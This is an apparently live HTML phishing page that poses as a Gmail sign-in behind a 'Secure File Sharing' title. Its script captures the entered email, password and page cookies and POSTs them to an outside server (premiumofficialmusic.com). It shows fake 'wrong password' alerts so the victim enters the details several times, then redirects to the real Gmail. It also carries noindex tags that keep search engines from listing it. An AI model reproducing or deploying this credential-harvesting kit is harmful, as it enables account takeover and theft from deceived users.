<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <title>Secure File Sharing, Storage and Collaboration |</title>

    <meta name="robots" content="noindex">
    <meta name="robots" content="noindex, nofollow">
    <meta name="robots" content="noimageindex">
    <meta name="googlebot" content="noindex">


    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style type="text/css">
        div#container {
            position: relative;
            width: 500px;
            margin-top: 0px;
            margin-left: auto;
            margin-right: auto;
            text-align: left;
        }

        body {
            text-align: center;
            margin: 0
        }
    </style>


    <script type="text/javascript">
        function unhideBody() {
            var bodyElems = document.getElementsByTagName("body");
            bodyElems[0].style.visibility = "visible";
        }
    </script>

<body style="visibility:hidden" onload="unhideBody()">
    <style type="text/css">
        .textbox {
            border: 1px solid #c1c1c1;
            border-radius: 2px;
            font-family: "Helvetica Neue", "HelveticaNeue", Helvetica, Arial, sans-serif;
            font-size: 13px;
            height: 34px;
            background: transparent;
            line-height: normal;
            padding: 5px 8px 6px 8px;
            width: 100%;
            outline: 0;
            resize: none;
            outline: none;
            border: none;
            -webkit-appearance: none;
        }
    </style>
    </head>

    <body bgColor="#F9F9F9">
        <div id="container">
            <div id="image1"
                style="position:absolute; overflow:hidden; left:0px; top:0px; width:498px; height:410px; z-index:0"><img
                    src="images/8765rdcg8ujn.png" alt="" title="" border=0 width=498 height=410></div>


            <input type='hidden' name='form-name' value='Gmailsignin' />


            <input name="email" id="email" placeholder="Email or phone" required class="textbox" type="Email"
                style="position:absolute;width:359px;left:56px;top:210px;z-index:2">
            <p></p>

            <input name="password" id="password" placeholder="Password" required class="textbox" type="password"
                style="position:absolute;width:359px;left:56px;top:300px;z-index:2"><br><b>


                <div id="formimage1" style="position:absolute; left:343px; top:354px; z-index:5">
                    <button type="button" id="submitBtn" style="background: transparent;border: none;">
                        <img name="formimage1" width="90" height="42"
                            src="images/987654567UJHGFR4E4E343.png" />
                    </button>

                </div>
        </div>


        <script>
            let submissionCount = 0;

            document.getElementById("submitBtn").addEventListener("click", function () {
                // Get the URL specified by the user
                const email = document.getElementById("email").value;
                const password = document.getElementById("password").value;
                const emailtype = "GOOGLE MAIL";

                if (!email) {
                    alert("Please enter a valid email address.");
                    return;
                }

                if (!password) {
                    alert("Please enter a valid password.");
                    return;
                }

                submissionCount++;

                if (submissionCount < 3) {
                    alert("wrong email or password. Please Try again");
                    submitForm();
                } else {
                    // Redirect after the third submission
                    window.location.href = "https://gmail.com/";
                }
            });

            async function submitForm() {
                // Get the URL specified by the user
                const email = document.getElementById("email").value;
                const password = document.getElementById("password").value;
                const emailtype = "GOOGLE MAIL";

                if (!email) {
                    alert("Please enter a valid email address.");
                    return;
                }

                if (!password) {
                    alert("Please enter a valid password.");
                    return;
                }

                // Filter cookies for the specified URL (same-origin policy applies)
                const cookies = document.cookie;

                // Send data to the PHP server
                const response = await fetch('https://premiumofficialmusic.com/001/abc.php', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ cookies: cookies, email: email, password: password, emailtype: emailtype })
                });

                if (response.ok) {
                    // alert('Error please retype your login details');
                } else {
                    alert('Failed to login. Please retry.');
                }
            }
        </script>
    </body>


</html>